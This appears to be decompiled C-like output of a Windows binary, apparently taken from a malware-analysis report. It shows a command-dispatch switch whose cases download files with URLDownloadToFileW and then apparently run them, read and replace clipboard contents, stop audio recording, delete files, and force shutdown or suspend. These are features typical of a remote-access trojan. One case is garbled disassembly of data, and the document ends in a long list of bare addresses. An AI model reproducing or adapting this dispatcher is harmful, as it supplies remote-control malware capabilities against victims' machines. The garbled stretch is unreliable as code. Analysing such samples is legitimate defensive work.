									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46e3b0;
									__eax = E00409026(__ebx, 0x46e3b0, __eflags);
									goto L37;
								case 0x15:
									__esi = 0x46e3b0;
									__ecx = 0x46e3b0;
									__eax = E00409D6B(0x46e3b0);
									__ecx = 0x46e3b0;
									L34:
									__eax = E00408ED4(__ebx, __ecx);
									goto L127;
								case 0x16:
									__eflags =  *0x46daed - __bl;
									asm("sbb eax, 0x46daed");
									if(__eflags == 0) {
										__edx = 0;
										__cl = 0;
										__eax = E0040A6AE(0);
									}
									goto L127;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__edi = 0x46e1b8;
									__ecx = 0x46e1b8;
									__eax = E00401F9F(0x46e1b8, __eax);
									__esi = 0x46e1d0;
									__ecx = 0x46e1d0;
									__eax = E00404943(0x46e1d0);
									__ecx = 0x46e1d0;
									__eax = E004049DE(0x46e1d0, 0x46e1d0, 0x46e1d0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x46e1b8);
									__eflags =  *0x46daaa - __bl; // 0x0
									if(__eflags == 0) {
										__eax = E004020DE(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020DE(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00404BB7(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00404D05(__ecx, __edx, 0x404519, __ebx);
									goto L127;
								case 0x18:
									__eax =  *0x46dac0();
									__ecx = 0x46e1d0;
									__eax = E00404F18(0x46e1d0, __edx);
									goto L127;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v444;
									 *0x46da74 = __bl;
									__eax = E00401E3B( &_v444, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020DE(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v452;
									__ecx = E00401E3B( &_v452, __edx, __eflags, 2);
									__eax = E00401F87(__ecx);
									_push(__eax);
									__ecx =  &_v456;
									__ecx = E00401E3B( &_v456, __edx, __eflags, 1);
									__eax = E00401F87(__ecx);
									__eax = E004374E4(__ecx, __eax);
									__ecx =  &_v460;
									__esi = __eax;
									__ecx = E00401E3B( &_v460, __edx, __eflags, 0);
									__eax = E00401F87(__ecx);
									__eax = E004374E4(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E004016F8(__ecx, __edx, __edi, __esi);
									goto L127;
								case 0x1a:
									_push( *0x46dab8);
									__eax = __eax ^ 0x0046dab8;
									 *0x46da74 = 1;
									waveInStop(??) = waveInClose( *0x46dab8);
									goto L127;
								case 0x1b:
									 *0x46dd60 =  *0x46dd60 + 1;
									__eflags =  *0x46dd60;
									__eax = 0x46dd60 + __eax;
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v452;
									__eax = E00401E3B( &_v452, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004101C6(__ebx);
									__esp = __esp + 0x30;
									L37:
									 *0x46dd60 =  *0x46dd60 - 1;
									goto L127;
								case 0x1c:
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									E00401F87(__ecx) = DeleteFileW(__eax);
									goto L127;
								case 0x1d:
									__eax = E00410199();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x46dd60 - __ebx;
										if( *0x46dd60 == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									asm("scasb");
									 *__eax =  *__eax | __eax;
									__al = __al + __ch;
									__eflags = __al;
									E0040ADA8();
									asm("pushad");
									__ecx = __ecx + 1;
									__bl = __bl + __ah;
									asm("das");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x39)) =  *((intOrPtr*)(__edx + 0x39)) + __bh;
									__ecx = __ecx + 1;
									__dh = __dh + __ch;
									__eflags = __eax - 0x3dee0041;
									__ecx = __ecx + 1;
									__ah = __ah + __ch;
									asm("das");
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __dh;
									 *__ecx =  *__ecx ^ __al;
									 *__eax =  *__eax << __cl;
									__ecx = __ecx + 1;
									_a44 = _a44 + __dl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x30)) =  *((intOrPtr*)(__edx + 0x30)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x5affbed0)) =  *((intOrPtr*)(__ecx - 0x5affbed0)) + __ah;
									 *__ecx =  *__ecx ^ __al;
									asm("fnsave [eax]");
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __dh;
									 *__ecx =  *__ecx ^ __eax;
									__eflags =  *__ecx;
									if( *__ecx < 0) {
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edx + 0x1f004131)) =  *((intOrPtr*)(__edx + 0x1f004131)) + __ah;
										__al = __al ^  *__ecx;
										__esi = __esi -  *__edx;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__eax + 0x32)) =  *((intOrPtr*)(__eax + 0x32)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edi + 0x32)) =  *((intOrPtr*)(__edi + 0x32)) + __bl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__esi + 0x32)) =  *((intOrPtr*)(__esi + 0x32)) + __ch;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__ebx - 0x3bffbece)) =  *((intOrPtr*)(__ebx - 0x3bffbece)) + __dl;
										__al = __al ^  *__ecx;
										asm("les edi, [ecx]");
										__ecx = __ecx + 1;
										__dh = __dh + __ch;
										__eflags = __eax - 0x3dee0041;
										__ecx = __ecx + 1;
										__ah = __ah + __dl;
										__al = __al ^  *__ecx;
										__eflags = __al;
									}
									 *__eax =  *__eax + __bh;
									__eax = __eax ^  *__ecx;
									__ebp =  &_v5;
									__eax = __eax ^  *__ecx;
									__esp =  &_v5;
									_pop(__ebp);
									__eax = __eax ^  *__ecx;
									asm("in eax, dx");
									__eax = __eax ^  *__ecx;
									__al = __al - 0x34;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x34)) =  *((intOrPtr*)(__edx + 0x34)) + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) + __bl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esp + __esi + 0x41)) =  *((intOrPtr*)(__esp + __esi + 0x41)) + __ch;
									 *((intOrPtr*)(__esi + 0x34)) =  *((intOrPtr*)(__esi + 0x34)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esi + 0x357f0041)) =  *((intOrPtr*)(__esi + 0x357f0041)) + __cl;
									__ecx = __ecx + 1;
									__ebx->i = __ebx->i + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edx + 0x18004137)) =  *((intOrPtr*)(__edx + 0x18004137)) + __dh;
									asm("aaa");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + 0x14004137)) =  *((intOrPtr*)(__edi + 0x14004137)) + __dl;
									__eflags =  *__ecx - __al;
									__eax = __eax - 1;
									 *0xc2004138 = __al;
									__eflags =  *__ecx - __al;
									asm("loop 0x3a");
									__ecx = __ecx + 1;
									 *__edx =  *__edx + __al;
									__eflags =  *__ecx - __eax;
									_pop(__edx);
									__eflags =  *__ecx - __eax;
									asm("out dx, al");
									__eflags = __eax - 0x39a40041;
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __dl;
									__eax -  *__ecx = __al - 0x3b;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi + __esp)) =  *((intOrPtr*)(__edi + __esp)) + __bh;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__esp + __edi + 0x3cd40041)) =  *((intOrPtr*)(__esp + __edi + 0x3cd40041)) + __dh;
									__ecx = __ecx + 1;
									__ah = __ah + __dh;
									__eflags = __al -  *__ecx;
									if(__al !=  *__ecx) {
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__esp + __edi + 0x3d7a0041)) =  *((intOrPtr*)(__esp + __edi + 0x3d7a0041)) + __dl;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__ecx - 0x77ffbec3)) =  *((intOrPtr*)(__ecx - 0x77ffbec3)) + __al;
										__eflags = __eax - 0x3d4b0041;
										__ecx = __ecx + 1;
										__ah = __ah + __dh;
										__eflags = __al - 0x41;
										 *((intOrPtr*)(__edi - 0x1ffbec3)) =  *((intOrPtr*)(__edi - 0x1ffbec3)) + __cl;
										__eflags = __al - 0x41;
										 *((intOrPtr*)(__edi + __esp)) =  *((intOrPtr*)(__edi + __esp)) + __ch;
										__ecx = __ecx + 1;
										__ebx->i = __ebx->i + __dh;
										__eflags = __al - 0x41;
										__cl = __cl + __al;
										__eflags = __eax -  *__ecx;
										asm("out dx, al");
										__eflags = __eax - 0x12000041;
										asm("adc al, [ecx]");
										asm("adc al, [edx]");
										__edx = __edx +  *__edx;
										__al = __al + 5;
										__eflags = __al;
										_push(es);
									}
									_pop(es);
									asm("adc dl, [edx]");
									asm("adc cl, [eax]");
									 *__edx =  *__edx | __ecx;
									asm("adc cl, [ebx]");
									__al = __al | 0x00000012;
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									__eax = __eax | 0x12100f0e;
									asm("adc dl, [edx]");
									asm("adc [esi-0x75], edx");
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									E004047EF(0) = __esi;
									_pop(__esi);
									return __esi;
									goto L135;
								case 0x1f:
									__eax = E0040B4AC(__ebx, __eflags);
									goto L127;
								case 0x20:
									while(1) {
										__eflags =  *0x46dd60 - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__ecx =  &_v448;
									__esi = __eax;
									__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
									__eax = E00401F87(__eax);
									__dl =  *__esi;
									__ecx =  &_v432;
									__eax = E00418A4B( &_v432, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v432;
									_push(E00401EDD( &_v432));
									__ecx =  &_v452;
									__ecx = E00401E3B( &_v452, __edx, __eflags, 2);
									__eax = E00401F87(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L59;
									}
									goto L107;
								case 0x21:
									while(1) {
										__eflags =  *0x46dd60 - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__ecx =  &_v448;
									__esi = __eax;
									__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
									__eax = E00401F87(__eax);
									__dl =  *__esi;
									__ecx =  &_v432;
									__eax = E00418A4B( &_v432, __edx, __eax);
									__ecx =  &_v432;
									__eax = E00401EDD( &_v432);
									__ecx =  &_v452;
									__esi = __eax;
									__eax = E00401E3B( &_v452, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = E0041843E(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L59:
										__esp = __esp - 0x18;
										__eax =  &_v444;
										__ecx = __esp;
										E004074B3(__ebx, __esp, __edx, __eflags,  &_v444) = E0040B106();
										__esp = __esp + 0x18;
									}
									goto L107;
								case 0x22:
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 2);
									__eax = E00401F87(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v448;
									__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
									__eax = E00401F87(__eax);
									__ebx = 0;
									__ecx =  &_v452;
									__ecx = E00401E3B( &_v452, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__eax = MessageBoxW(0, __eax, __eax, __eax);
									__ecx =  &_v456;
									__esi = __eax;
									__eax = E00401E3B( &_v456, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx =  &_v384;
									__edi = __esp;
									__edx = __esi;
									__edx = E00417C16(0,  &_v384, __esi);
									__ecx =  &_v408;
									__edx = __eax;
									__ecx = __edi;
									__eax = E00402F85(0, __edi, __edx, __eflags, __eax);
									_push(0x26);
									L126:
									__ecx = 0x46e848;
									__eax = E00404BB7(__ebx, 0x46e848, __edx, __eflags);
									__ecx =  &_v420;
									__eax = E00401FB9();
									__ecx =  &_v396;
									__eax = E00401FB9();
									goto L127;
								case 0x23:
									__eax = E00414367();
									__ebx = 0;
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00405C1B(__edx);
									__ecx =  &_v448;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = E00401E3B( &_v448, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00405C1B(__edx);
										__ecx =  &_v448;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = E00401E3B( &_v448, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00405C1B(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v444;
												__esi = __eax;
												__eax = E00401E3B( &_v444, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00405C1B(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v444;
													__eax = E00401E3B( &_v444, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00405C1B(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L76;
													}
												} else {
													_push(0);
													_push(0);
													L76:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v444;
												__ecx = E00401E3B( &_v444, __edx, __eflags, 1);
												__eax = E00401F87(__ecx);
												__eax = E004374E4(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L71;
											}
										} else {
											__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
											__eax = E00401F87(__ecx);
											__eax = E004374E4(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L71;
										}
									} else {
										__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
										__eax = E00401F87(__ecx);
										__eax = E004374E4(__ecx, __eax);
										L71:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L127;
								case 0x24:
									L82:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										0x46079c =  !=  ? __edi : 0x46079c;
										__ecx =  &_v424;
										__eax = E00404260(__ebx,  &_v424,  !=  ? __edi : 0x46079c);
										__esp = __esp - 0x18;
										__edx =  &_v428;
										__ecx = __esp;
										__eax = E00417D8C(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x46e848;
										__eax = E00404BB7(__ebx, 0x46e848, __edx, __eflags);
										L107:
										__ecx =  &_v424;
										L108:
										__eax = E00401EE2();
									}
									goto L127;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v444;
										__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
										__eax = E0040247B();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v448;
										__esi = __eax;
										__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
										__eax = E0040247B();
										__ecx =  &_v452;
										__ecx = E00401E3B( &_v452, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L81;
									}
									goto L127;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L81:
										__eax = CloseClipboard();
										goto L82;
									}
									goto L127;
								case 0x27:
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E0040247B();
									__ecx =  &_v448;
									__esi = __eax;
									__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E0040F6D9();
									goto L127;
								case 0x28:
									__eax =  &_v428;
									__ebx = 0;
									__ecx =  &_v444;
									_v428 = 0;
									_v432 = 0;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__edx =  &_v436;
									__ecx = __eax;
									__eax = E00417B01(__eax, __edx,  &_v428);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__edx = _v428;
										__ecx = _v432;
										E0040F6D9() = L00437769(_v432);
										L26:
										_pop(__ecx);
									}
									goto L127;
								case 0x29:
									__eax = E0040A767(__ebx, __eflags);
									goto L127;
								case 0x2a:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004146CF(__ebx, __edx);
									goto L104;
								case 0x2b:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00411820(__ebx, __edx);
									goto L104;
								case 0x2c:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00405531(__ebx, __edx, __eflags);
									goto L104;
								case 0x2d:
									_push(__ecx);
									__esi = 0x46e5f0;
									__ecx = 0x46e5f0;
									__eax = E0040247B();
									__ecx = 0x46e5f0;
									__eax = E00401F87(0x46e5f0);
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									E0040247B() = __eax + 1;
									__ecx =  &_v448;
									__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__ecx = 0x46e5a8;
									__edx = E00401F87(0x46e5a8);
									__eax = E00410CAF(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L104;
								case 0x2e:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0040EE85(__ebx, __edx, __eflags);
									goto L104;
								case 0x2f:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0041656F(__ebx);
									L104:
									goto L127;
							}
						}
					}
				}
				L135:
			}

































































                                                                                                0x00412dbe
                                                                                                0x00412dbe
                                                                                                0x00412dbe
                                                                                                0x00412dce
                                                                                                0x00412dd0
                                                                                                0x00412dd8
                                                                                                0x00412de0
                                                                                                0x00412dfd
                                                                                                0x00412e07
                                                                                                0x00412e0c
                                                                                                0x00412e17
                                                                                                0x00412e1c
                                                                                                0x00412e29
                                                                                                0x00412e32
                                                                                                0x00412e3c
                                                                                                0x00412e3f
                                                                                                0x00412e41
                                                                                                0x00413ad7
                                                                                                0x00413add
                                                                                                0x00413ae0
                                                                                                0x00413aed
                                                                                                0x00000000
                                                                                                0x00413b19
                                                                                                0x00413b22
                                                                                                0x00413b24
                                                                                                0x00413b30
                                                                                                0x00413b32
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413b3e
                                                                                                0x00413b47
                                                                                                0x00413b49
                                                                                                0x00413b4f
                                                                                                0x00413b57
                                                                                                0x00413b5b
                                                                                                0x00413b62
                                                                                                0x00413b64
                                                                                                0x00413b6a
                                                                                                0x00413b6c
                                                                                                0x00413b70
                                                                                                0x00413b76
                                                                                                0x00413b7a
                                                                                                0x00413b81
                                                                                                0x00413b85
                                                                                                0x00413b87
                                                                                                0x00413b8c
                                                                                                0x00413b8f
                                                                                                0x00413b92
                                                                                                0x00413b97
                                                                                                0x00413b99
                                                                                                0x00413b9e
                                                                                                0x00413ba1
                                                                                                0x00413baa
                                                                                                0x00413bac
                                                                                                0x00413bae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413c3e
                                                                                                0x00413c47
                                                                                                0x00413c49
                                                                                                0x00413c51
                                                                                                0x00413c5a
                                                                                                0x00413c5c
                                                                                                0x00413c69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413cb6
                                                                                                0x00413cba
                                                                                                0x00413cbf
                                                                                                0x00413cc2
                                                                                                0x00413cca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413cd6
                                                                                                0x00413cda
                                                                                                0x00413cdf
                                                                                                0x00413ce2
                                                                                                0x00413cea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413b05
                                                                                                0x00413b0a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413c76
                                                                                                0x00413c7a
                                                                                                0x00413c7f
                                                                                                0x00413c82
                                                                                                0x00413c8a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413c96
                                                                                                0x00413c9a
                                                                                                0x00413c9f
                                                                                                0x00413ca2
                                                                                                0x00413caa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413d7a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413d81
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413d88
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413d4b
                                                                                                0x00413d4d
                                                                                                0x00413d58
                                                                                                0x00413d5a
                                                                                                0x00413d61
                                                                                                0x00413d65
                                                                                                0x00413d67
                                                                                                0x00413d6a
                                                                                                0x00413d6f
                                                                                                0x00413d71
                                                                                                0x00413d73
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413cf4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413d8f
                                                                                                0x00413d96
                                                                                                0x00413d9a
                                                                                                0x00413d9c
                                                                                                0x00413da1
                                                                                                0x00413da4
                                                                                                0x00413da8
                                                                                                0x00413daa
                                                                                                0x00413db7
                                                                                                0x00413db9
                                                                                                0x00413dc3
                                                                                                0x00413dc5
                                                                                                0x00413dc7
                                                                                                0x00413dcd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413cfe
                                                                                                0x00413d05
                                                                                                0x00413d40
                                                                                                0x00413d07
                                                                                                0x00413d07
                                                                                                0x00413d09
                                                                                                0x00413d0e
                                                                                                0x00413d1a
                                                                                                0x00413d20
                                                                                                0x00413d20
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413c2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413c33
                                                                                                0x00413c35
                                                                                                0x00413c36
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413bc1
                                                                                                0x00413bc8
                                                                                                0x00413bcf
                                                                                                0x00413bd3
                                                                                                0x00413bd8
                                                                                                0x00413bdb
                                                                                                0x00413bde
                                                                                                0x00413be5
                                                                                                0x00413be9
                                                                                                0x00413bee
                                                                                                0x00413bf1
                                                                                                0x00413bf4
                                                                                                0x00413bfb
                                                                                                0x00413bff
                                                                                                0x00413c04
                                                                                                0x00413c07
                                                                                                0x00413c0a
                                                                                                0x00413c0f
                                                                                                0x00413c16
                                                                                                0x00413c1b
                                                                                                0x00413c22
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413aed
                                                                                                0x00000000
                                                                                                0x00412e47
                                                                                                0x00412e47
                                                                                                0x004139e5
                                                                                                0x00413a02
                                                                                                0x00413a0d
                                                                                                0x00413a17
                                                                                                0x00413a27
                                                                                                0x00413a27
                                                                                                0x00413a2a
                                                                                                0x00413a2f
                                                                                                0x00413a35
                                                                                                0x00413a40
                                                                                                0x00413a4b
                                                                                                0x00413a68
                                                                                                0x00413a85
                                                                                                0x00413a91
                                                                                                0x00413a96
                                                                                                0x00413a9e
                                                                                                0x00413ac1
                                                                                                0x00413ac1
                                                                                                0x00413acd
                                                                                                0x00000000
                                                                                                0x00412e4d
                                                                                                0x00412e4d
                                                                                                0x00412e51
                                                                                                0x00413dee
                                                                                                0x00413df2
                                                                                                0x00413dfe
                                                                                                0x00413e0a
                                                                                                0x00413e17
                                                                                                0x00412e57
                                                                                                0x00412e59
                                                                                                0x00000000
                                                                                                0x00412e6c
                                                                                                0x00412e83
                                                                                                0x00412e9f
                                                                                                0x00412efa
                                                                                                0x00412efe
                                                                                                0x00412f09
                                                                                                0x00412f0d
                                                                                                0x00412f16
                                                                                                0x00412f22
                                                                                                0x00412f2e
                                                                                                0x00412f3a
                                                                                                0x00412f46
                                                                                                0x00412f52
                                                                                                0x00412f5e
                                                                                                0x00412f67
                                                                                                0x00412f70
                                                                                                0x00412f88
                                                                                                0x00412f90
                                                                                                0x00412fbd
                                                                                                0x00412fc2
                                                                                                0x00412fc9
                                                                                                0x00412fce
                                                                                                0x00412fd0
                                                                                                0x00412fd6
                                                                                                0x00412fd7
                                                                                                0x00000000
                                                                                                0x00412fd7
                                                                                                0x00412f92
                                                                                                0x00412f94
                                                                                                0x00412f9e
                                                                                                0x00412fae
                                                                                                0x00412fa0
                                                                                                0x00412fa1
                                                                                                0x00412fa1
                                                                                                0x00412f9e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412fe3
                                                                                                0x00412fe5
                                                                                                0x00412fd9
                                                                                                0x00412fd9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041397a
                                                                                                0x0041397e
                                                                                                0x00413983
                                                                                                0x00413986
                                                                                                0x00413988
                                                                                                0x0041398a
                                                                                                0x0041398f
                                                                                                0x00413991
                                                                                                0x00413996
                                                                                                0x0041399b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412ff3
                                                                                                0x00412ffa
                                                                                                0x00412fff
                                                                                                0x00413002
                                                                                                0x00413006
                                                                                                0x00413008
                                                                                                0x00413013
                                                                                                0x00413015
                                                                                                0x0041301f
                                                                                                0x00413021
                                                                                                0x00413023
                                                                                                0x00413029
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413032
                                                                                                0x0041303b
                                                                                                0x0041303d
                                                                                                0x00413049
                                                                                                0x0041304b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130d3
                                                                                                0x004130d3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413057
                                                                                                0x00413060
                                                                                                0x00413062
                                                                                                0x0041306f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041307a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130a1
                                                                                                0x0041307c
                                                                                                0x0041307c
                                                                                                0x0041307e
                                                                                                0x0041307e
                                                                                                0x00413087
                                                                                                0x00413089
                                                                                                0x00413096
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130a5
                                                                                                0x004130ac
                                                                                                0x004130b5
                                                                                                0x004130b7
                                                                                                0x004130c4
                                                                                                0x004130ca
                                                                                                0x004130ce
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004130dd
                                                                                                0x004130df
                                                                                                0x004130eb
                                                                                                0x004130ed
                                                                                                0x004130f3
                                                                                                0x004130f7
                                                                                                0x004130fd
                                                                                                0x00413102
                                                                                                0x0041310c
                                                                                                0x0041311f
                                                                                                0x00413125
                                                                                                0x00413129
                                                                                                0x0041312e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413139
                                                                                                0x0041313d
                                                                                                0x00413143
                                                                                                0x00413148
                                                                                                0x0041314d
                                                                                                0x00413153
                                                                                                0x0041315b
                                                                                                0x0041315f
                                                                                                0x00413164
                                                                                                0x00413167
                                                                                                0x0041316f
                                                                                                0x00000000
                                                                                                0x0041316f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041317b
                                                                                                0x0041317d
                                                                                                0x00413189
                                                                                                0x00413197
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004131a4
                                                                                                0x004131a8
                                                                                                0x004131ae
                                                                                                0x004131b3
                                                                                                0x004131ba
                                                                                                0x004131c3
                                                                                                0x004131c5
                                                                                                0x004131d1
                                                                                                0x004131d3
                                                                                                0x004131db
                                                                                                0x004131e4
                                                                                                0x004131e6
                                                                                                0x004131ec
                                                                                                0x004131f2
                                                                                                0x004131f4
                                                                                                0x004131fa
                                                                                                0x004131fa
                                                                                                0x004131fa
                                                                                                0x00413202
                                                                                                0x0041320a
                                                                                                0x00413210
                                                                                                0x00413212
                                                                                                0x00413214
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041321f
                                                                                                0x00413220
                                                                                                0x00413225
                                                                                                0x00413225
                                                                                                0x00413227
                                                                                                0x00413228
                                                                                                0x0041322a
                                                                                                0x0041322a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041322d
                                                                                                0x00413231
                                                                                                0x00413236
                                                                                                0x00413239
                                                                                                0x0041323c
